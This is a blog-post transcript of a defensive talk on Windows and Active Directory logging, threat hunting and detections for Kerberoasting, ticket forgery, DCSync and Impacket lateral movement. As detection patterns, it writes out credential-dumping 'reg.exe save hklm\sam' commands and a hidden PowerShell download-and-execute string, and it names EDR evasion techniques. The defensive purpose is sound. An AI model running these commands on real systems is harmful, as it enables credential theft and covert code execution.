Intro to Windows & AD Defense
Adam Hassan / October 2024 (968 Words, 6 Minutes)
This is part 3/3 of my Windows Week series that I did for UFSIT
Transcript:
Windows & AD Defense How to win
What is this talk? Basics of Windows logging
How to come up with your own detections
Me enumerating different attacks and how to defend them This part will be less structured…
My methodology If possible, you want to patch everything and STOP attacks altogether In fast-paced competitions like CCDC, this isn’t possible
As a backup, we want to log when something happens Bug from 2020 exploited? Yeah, you can patch it eventually (if you have time) But for now, log it. That way, you can patch it after red team exploits it once Better late than never
Logging Basics
Group Policy GPOs: Group Policy Objects: Tool that allows admins to manage and configure operating systems, applications, and users’ settings.␋ Local Group Policy: Applied only to the local machine. Configurations affect individual devices/users. Domain Group Policy: Managed centrally in Active Directory. Applies settings across multiple users and devices in a network.
Example GPOs Enable logging of: Bad logins TGT and ST being requested File being accessed Certificate being requested … Success audits are when something is successful (eg. successfully logged in) Failure audits are when something isn’t successful Set password policy Set policy for minimum authentication (NTLM, Kerberos…) Disable Guest Account Disable LLMNR Set up firewalls on machines Prevent USBs from being used Enable SMB signing …
Event Viewer
Sysmon
Wazuh
My (unfinished) rules
https://github.com/Adamkadaban/wazoop/blob/main/Rules/Windows.xml
LDAPMonitor https://github.com/p0dalirius/LDAPmonitor
What could this be used for? When I use BloodHound to do an attack and I add myself to a group You can see LDAP change ShadowCredentials technique msDS-KeyCredentialLink changes When a password is changed Password last changed attribute changes … This can also be used to detect: noPac ZeroLogon Any domain privesc
BlueSpawn + AtomicRedTeam https://www.youtube.com/watch?v=-8QC0CdCbuc
Threat Hunting
autoruns.exe AutoRuns Will attempt to find all Windows entries that cause something to automatically run Looks in registry keys, services, scheduled tasks, startup programs… Will not find everything
Will show you if something is digitally signed If it is self-signed or not signed… kinda sus If it is signed by Microsoft… probably fine
Also allows you to upload all binaries to VirusTotal This is SOOOO useful!!
procexp.exe Process Explorer Will show you all processes on the computer
Will show you if something is digitally signed If it is self-signed or not signed… kinda sus If it is signed by Microsoft… probably fine
Also allows you to upload all binaries to VirusTotal This is SOOOO useful!!
DETECTION!
DETECTION - Recon
SMB null and anonymous auth These should probably be disabled… but We know that attackers are likely going to start with this If you detect it, you know that IP address is trying to start an attack␋
https://www.blumira.com/integration/how-to-disable-null-session-in-windows/
SMB Shares How does netexec know which shares are writable?
DETECTION - Initial Access
Think like a Red Teamer What do attackers do when they first get access?
Think like a Red Teamer What do attackers do when they first get access? whoami cmd.exe /c powershell.exe -nop IEX IRM -ep bypass -enc -w hidden hostname ipconfig netstat tasklist systeminfo net (user | group | use | localgroup) …
DETECTION - Kerberos Tickets
Kerberoasting & ASReproasting What does an attacker do when they Kerberoast? They look for users that have SPNs set So let’s look for that LDAP query: (servicePrincipalName=*) Impacket does this precise query by default, but it can be turned off
Impacket, Netexec, and Rubeus will request ALL STs by default Let’s detect high numbers of STs being requested
Kerberoasting & ASReproasting (pt2) When attackers kerberoast or asreproast, they will often request a downgraded hash By default, windows uses e-type 19 (AES) This is hard to crack, so attackers request a downgrade to e-type 23 (RC4) Let’s detect all TGTs and STs with weak encryption
Golden and Silver Ticket attacks Windows, when giving tickets, will by default give the ticket a 10 hour expiry Impacket (ticketer.py) sets it to 10 years
Usually, we only get a TGT if we request one If a user has a TGT but didn’t request it, perhaps they forged it themselves?
Golden and Silver Ticket attacks (pt2) When creating a ticket, attackers will often pass in the nthash This is easier to get
Windows by default will use the aeskey This is harder to get
So let’s detect any time a ticket is created using NT instead of AES
DETECTION - Credentials
DCSync (NTDS) We can look for file read access to ntds.dit What else can we look for?
DCSync (NTDS) We expect only machine accounts to DCSync
SAM & LSA We can look for commands like this: reg.exe save hklm\sam C:\temp\sam.save reg.exe save hklm\system C:\temp\system.save reg.exe save hklm\security C:\temp\security.save
https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8
DETECTION - Lateral Movement
evilwinrm User agent from evil-winrm starts with the string “Ruby WinRM Client” Ruby WinRM Client (2.8.3, ruby 3.2.2 (2023-03-30))
If you block this, red team could use other tools (like the official winrm tool) evil-winrm would be blocked or detected though
psexec/wmiexec/smbexec/atexec/dcomexec psexec starts a service with a malicious .exe file Thus, detect ALL new services This isn’t smth that happens often smbexec is the same, but makes a .bin instead of a .exe impacket by default will make services with these names: [A-Za-z]{8}.exe wmiexec works by using WMI and DCOM to communicate with a cmd.exe or powershell.exe child process Detect suspicious children of wmiprvse.exe atexec works with scheduled tasks, but doesn’t spawn a shell tasks are placed in temp directory with name [A-Za-z]{8} dcomexec uses dcom with rpc to execute commands Look for shells as child processes of mmc.exe
https://regex101.com/
https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/
DETECTION - Delegation
What is delegation? Kerberos delegations allow services to access other services on behalf of domain users.
Attackers often have to create a machine account to exploit Look for query of ms-DS-MachineAccountQuota Look for new machine account on the domain
You can limit these attacks by adding users to Protected Users Group Also by setting MAQ to 0
DETECTION - Defense Evasion
Powershell obfuscation
This executes malicious code!
Luckily, we have PowerShell logging! Script Block Logging Records blocks of code as they are executed This means that, as code is de-obfuscated, every step will be logged Transcription Records all input and output in powershell This shows up exactly as is shown to the user
https://devblogs.microsoft.com/powershell/defending-against-powershell-attacks/
CyberForce pt1
CyberForce pt2
DEF CON 25 - Daniel Bohannon, Lee Holmes - Revoke Obfuscation: PowerShell Obfuscation
https://github.com/danielbohannon/Revoke-Obfuscation
YARA File detection Write a rule for detecting static attributes in a binary Based on: Hashes Metadata Strings Bytes Filesize Imports
Dissecting a Rule
Lots of malware techniques Bypassing AMSI via memory patching Payload encryption Sleep obfuscation Import obfuscation API hashing Direct syscalls Indirect syscalls Stack spoofing …␋ https://hackback.zip/2024/05/05/Hiding-in-plain-sight-survey-of-edr-evasion-techniques.html
How to make your own detections
Make your own homelab! Game of Active Directory (GOAD) Detection Lab Set up Wazuh, Velociraptor, Sysmon, ELK, …
https://hackback.zip/